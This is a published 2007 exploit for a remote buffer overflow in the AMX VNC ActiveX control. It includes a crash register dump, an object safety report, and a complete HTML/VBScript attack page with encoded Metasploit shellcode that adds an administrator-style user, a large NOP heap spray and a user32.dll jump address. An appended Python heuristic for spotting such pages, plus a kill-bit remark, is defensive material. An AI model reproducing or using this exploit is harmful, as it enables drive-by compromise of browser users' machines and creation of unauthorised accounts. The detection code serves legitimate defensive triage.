AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit
Source: retrogod.altervista.org  Author: rgod  Published: 2007-06-29
<!--
21.17 23/06/2007
AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) remote buffer
overflow exploit / tested against IE6 on xp sp2 it

found this one inside GHDB, dork by JimmyNeutron:
WebControl intitle:"AMX NetLinx"
description:   "AMX Netlinx is a server appliance which
connects various devices like a beamer, laptop or video
recorder to the internet."

passing A*2000 to Host property:

EAX 03727C20
ECX 027B7890 ASCII "AAAAAAAA...
EDX 41414141
EBX 027ACE80 AmxVnc.027ACE80
ESP 0013DDFC
EBP 0013DE28
ESI 0013E00C
EDI 00000000
EIP 0278D6D1 AmxVnc.0278D6D1
0278D6D1   FF52 04          CALL DWORD PTR DS:[EDX+4]
Access violation when reading 41414145


Password, LogFile properties are also vulnerable
to the same issue

object safety report:

RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data
KillBitSet: False

translation: it works remotely without warnings

rgod
site: retrogod.altervista.org

-->
<HTML>
<object classid='clsid:6318EFFA-BE57-49EE-830C-C5E1ABD9ECCB' id='AmxVnc' ></OBJECT>
<script language='vbscript'>

'metasploit one, add a user "su" with pass "tzu"
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")
nop = string(9999999,unescape("%90"))
jmp = unescape("%ab%08%3e%7e") '0x7e3e08af user32.dll ,stores 0x07c435ff which reasonably points to our 10M nop, found with msfpescan
suntzu = String(1188, "A") + jmp + nop + scode
AmxVnc.Password = suntzu

</script>
</HTML>
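Added example, not part of rgod's original file or of any AMX code: a static triage heuristic for proxy or mail-gateway content that flags pages which instantiate the CLSID above and assign an oversized string to the Host, Password or LogFile property. `MAX_LEN`, the regexes, the function names and the sample markup are assumptions constructed for illustration.

```python
import re

# CLSID and property names come from the advisory text above.
AMX_CLSID = "6318EFFA-BE57-49EE-830C-C5E1ABD9ECCB"
RISKY_PROPS = ("host", "password", "logfile")
MAX_LEN = 256  # assumption: generous bound for a host name, password or path

OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(classid|id)\s*=\s*['"]?([^'"\s>]+)""", re.I)
ASSIGN_RE = re.compile(r"^[ \t]*([\w.]+)[ \t]*=[ \t]*(.+)$", re.M)
FILL_RE = re.compile(r"string\s*\(\s*(\d+)\s*,", re.I)
LITERAL_RE = re.compile(r'"([^"]*)"')
# Constructed sample: oversized fill assigned to Host, no payload.
SAMPLE = """<object classid='clsid:6318EFFA-BE57-49EE-830C-C5E1ABD9ECCB' id='AmxVnc'></object>
<script language='vbscript'>
pad = String(2000, "A")
AmxVnc.Host = pad
AmxVnc.Password = "secret"
</script>"""

def object_ids(html):
    """Ids of <object> tags that instantiate the AMX VNC control."""
    tags = [dict((k.lower(), v.lower()) for k, v in ATTR_RE.findall(t))
            for t in OBJECT_RE.findall(html)]
    return {a.get("id", "") for a in tags
            if a.get("classid") == "clsid:" + AMX_CLSID.lower()}

def est_len(expr, known):
    """Lower bound on the length of a VBScript string concatenation."""
    total = 0
    for term in (t.strip() for t in re.split(r"[+&]", expr)):
        fill, lit = FILL_RE.match(term), LITERAL_RE.fullmatch(term)
        if fill:  # String(n, ch) contributes n characters
            total += int(fill.group(1))
        else:     # quoted literal, else a previously sized variable
            total += len(lit.group(1)) if lit else known.get(term.lower(), 0)
    return total

def scan(html):
    """Return (property, estimated_length) for oversized assignments."""
    ids, known, findings = object_ids(html), {}, []
    for target, expr in ASSIGN_RE.findall(html):
        obj, _, prop = target.lower().partition(".")
        size = est_len(expr, known)
        if not prop:
            known[obj] = size  # plain variable: remember its size
        elif obj in ids and prop in RISKY_PROPS and size > MAX_LEN:
            findings.append((prop, size))
    return findings
```

Treat a hit as a triage signal only: the length estimate is a lower bound and does not follow obfuscated or dynamically built script. Because the object safety report shows KillBitSet: False, setting the kill bit for this CLSID remains the host-side control.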

 